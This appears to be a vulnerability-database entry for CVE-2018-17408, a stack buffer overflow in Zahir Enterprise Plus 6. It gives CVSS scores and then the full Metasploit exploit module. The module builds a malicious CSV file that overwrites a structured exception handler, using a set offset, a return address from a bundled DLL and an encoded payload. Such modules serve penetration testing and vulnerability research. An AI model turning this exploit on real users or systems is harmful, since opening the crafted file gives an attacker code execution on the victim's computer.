Zahir Enterprise Plus 6 Stack Buffer Overflow

2018-09-2911:59:14

f3ci, modpr0be

www.rapid7.com

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS

0.588

Percentile

97.8%

JSON

This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters via Import from other File. This results in overwriting a structured exception handler record.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
      'Description'    => %q{
       This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
       via Import from other File. This results in overwriting a structured exception handler record.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'f3ci',       # initial discovery
          'modpr0be'    # poc and Metasploit Module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-17408' ],
          [ 'EDB', '45505' ]
        ],
      'Platform'        => 'win',
      'Targets'         =>
        [
          ['Zahir Enterprise Plus 6 <= build 10b',
            {
              #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
              'Ret'     => 0x52016661,
              'Offset'  => 3041
            }
          ]
        ],
      'Payload'         =>
        {
          'Space'       => 5000,
          'BadChars'    => "\x00\x0a\x0d\x22\x2c",
          'DisableNops'     => true
        },
      'DisclosureDate'  => '2018-09-28',
      'DefaultTarget'   => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
    ])
  end

  def exploit
    buf = rand_text_alpha_upper(target['Offset'])
    buf << "\r\n"   # crash chars
    buf << rand_text_alpha_upper(380) # extra chars to hit the offset
    buf << generate_seh_record(target.ret)
    buf << payload.encoded

    file_create(buf)
  end
end